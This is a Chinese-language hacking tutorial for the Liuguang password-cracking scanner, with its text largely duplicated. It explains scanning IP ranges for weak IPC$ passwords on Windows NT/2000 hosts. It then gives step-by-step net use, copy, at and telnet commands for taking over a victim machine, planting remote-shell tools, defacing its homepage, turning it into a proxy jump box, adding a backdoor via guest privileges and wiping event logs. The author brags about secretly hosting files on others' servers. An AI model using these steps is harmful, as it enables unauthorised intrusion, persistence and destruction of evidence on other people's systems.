流光5.0破解密码教程(合集两篇)

1：流光使用：

步骤1：打开高级扫描向导设置扫描参数

“文件”--}“高级扫描向导”

--}在“起始”/“结束”位置填入，你要扫描的IP段。

--}在“ 目标系统”中选择你要检测的操作系统。

--}在“获取主机名”、“PING检查”前面打勾

--}在“检测项目”中选择“全选”

--}然后单击“下一步”选择“标准端口扫描”

说明：“标准断口”只对常见的断口进行扫描。

“自定义”可以自己定义进行扫描。

--}然后单击“下一步” 设置好所有检测项目后点击“下一步”

--}在选择主机界面选择“本地主机”使用本地主机进任务扫描。

步骤2：单击“开始”扫描过程中要想停止选择“取消”不过要等一段时间。

步骤3：查看扫描报告。扫描结束之后给出“HTLM”格式的报告

方法二：

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它…

因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了：)

流光的IPC探测：

一、目的和任务：

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程：

1、你得有流光，我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000，否则流光启动会失败!

什么是IPC：

IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。

注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码?当然可以 ! 不过，是不是太笨了点 …

2、首次启动流光，会看到注册的画面，具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：)填入IP，选择扫描NT/98主机

4、探测中……

(注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样)

有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办么? ：)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。

黑了他 !

开个dos prompt 执行如下命令，本次用的例子如下图。

1、 net use \对方ipipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \对方ipadmin$ || admin$是对方的winnt目录 ：) 这里文件多。

3、 net time \对方IP || 看看对方的本地时间

4、at \对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass (如果不是用icmd.exe，或者没有设置口令就不用了) ||

7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:interpubwwwroot .

假如首页文件是default.htm并且在c:interpubwwwroot，这样:copy default.htm \ipc$interpubwwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的：(，我们最好是物有所有，作成跳板吧，今后干活方便点：

执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：)

9、还能做成其他的么 ?

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：)

10、日志清除，断开连接 ：

执行我们copy 过去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use \ipipc$ /delete

流光简介

流光4.7)一个绝好的ftp、pop3解密工具，界面豪华，功能强大!功能简介如下：1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测，消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式，可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置，阻塞线程具有自杀功能，不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。

流光4.7新增功能：

1、加入了本地模式，在本机运行是不必安装Sensor。

2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。

3、后台扫描模式时，扫描的结果(*.PTR)可以直接通过附件发送到信箱。

4、Sensor的扫描速度加快。

5、减少了Sensor异常退出的BUG。

6、流光的界面和Sensor之间的通讯采用Triple-DES，密钥的长度最多可到192bits，保证整个传输过程不可监听。扫描的结果也只有在密钥正确的情况下才可阅读。

7、修正的控制服务，新的控制服务在升级Sensor时不再会失败。

8、Sensor的服务名称可以任意指定，控制服务和Sensor的进程名称也可以任意指定。

9、支持XP(本地模式)，很快会有98/ME的版本。

流光5.0的使用方法

1：流光概述

流光，这款工具可以让一个只会点击鼠标的人成为专业的黑客，这样说一点也不夸张。它可以探测POP3，FTP，HTTP，PROXY，FROM，SQL，SMTP，IPC，等各种漏洞。并针对个中漏洞设计不同的破解方案。

2：流光使用：

步骤1：打开高级扫描向导设置扫描参数

“文件”--}“高级扫描向导”

--}在“起始”/“结束”位置填入，你要扫描的IP段。

--}在“ 目标系统”中选择你要检测的操作系统。

--}在“获取主机名”、“PING检查”前面打勾

--}在“检测项目”中选择“全选”

--}然后单击“下一步”选择“标准端口扫描”

说明：“标准断口”只对常见的断口进行扫描。

“自定义”可以自己定义进行扫描。

--}然后单击“下一步” 设置好所有检测项目后点击“下一步”

--}在选择主机界面选择“本地主机”使用本地主机进任务扫描。

步骤2：单击“开始”扫描过程中要想停止选择“取消”不过要等一段时间。

步骤3：查看扫描报告。扫描结束之后给出“HTLM”格式的报告

方法二：

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它 …

因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了：)

流光的IPC探测：

一、目的和任务：

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程：

1、你得有流光，我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000，否则流光启动会失败!

什么是IPC：

IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。

注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码?当然可以 ! 不过，是不是太笨了点 …

2、首次启动流光，会看到注册的画面，具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：)填入IP，选择扫描NT/98主机

4、探测中……

(注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样)

有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办么? ：)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。

黑了他 !

开个dos prompt 执行如下命令，本次用的例子如下图。

1、 net use \对方ipipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \对方ipadmin$ || admin$是对方的winnt目录 ：) 这里文件多。

3、 net time \对方IP || 看看对方的本地时间

4、at \对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass (如果不是用icmd.exe，或者没有设置口令就不用了) ||

7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:interpubwwwroot .

假如首页文件是default.htm并且在c:interpubwwwroot，这样:copy default.htm \ipc$interpubwwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的：(，我们最好是物有所有，作成跳板吧，今后干活方便点：

执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：)

9、还能做成其他的么 ?

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：)

10、日志清除，断开连接 ：

执行我们copy 过去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use \ipipc$ /delete

流光简介

流光4.7)一个绝好的ftp、pop3解密工具，界面豪华，功能强大!功能简介如下：1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测，消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式，可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置，阻塞线程具有自杀功能，不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。

流光4.7新增功能：

1、加入了本地模式，在本机运行是不必安装Sensor。

2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。

3、后台扫描模式时，扫描的结果(*.PTR)可以直接通过附件发送到信箱。

4、Sensor的扫描速度加快。

5、减少了Sensor异常退出的BUG。

6、流光的界面和Sensor之间的通讯采用Triple-DES，密钥的长度最多可到192bits，保证整个传输过程不可监听。扫描的结果也只有在密钥正确的情况下才可阅读。

7、修正的控制服务，新的控制服务在升级Sensor时不再会失败。

8、Sensor的服务名称可以任意指定，控制服务和Sensor的进程名称也可以任意指定。

9、支持XP(本地模式)，很快会有98/ME的版本。

2：流光概述

流光，这款工具可以让一个只会点击鼠标的人成为专业的黑客，这样说一点也不夸张。它可以探测POP3，FTP，HTTP，PROXY，FROM，SQL，SMTP，IPC，等各种漏洞。并针对个中漏洞设计不同的破解方案。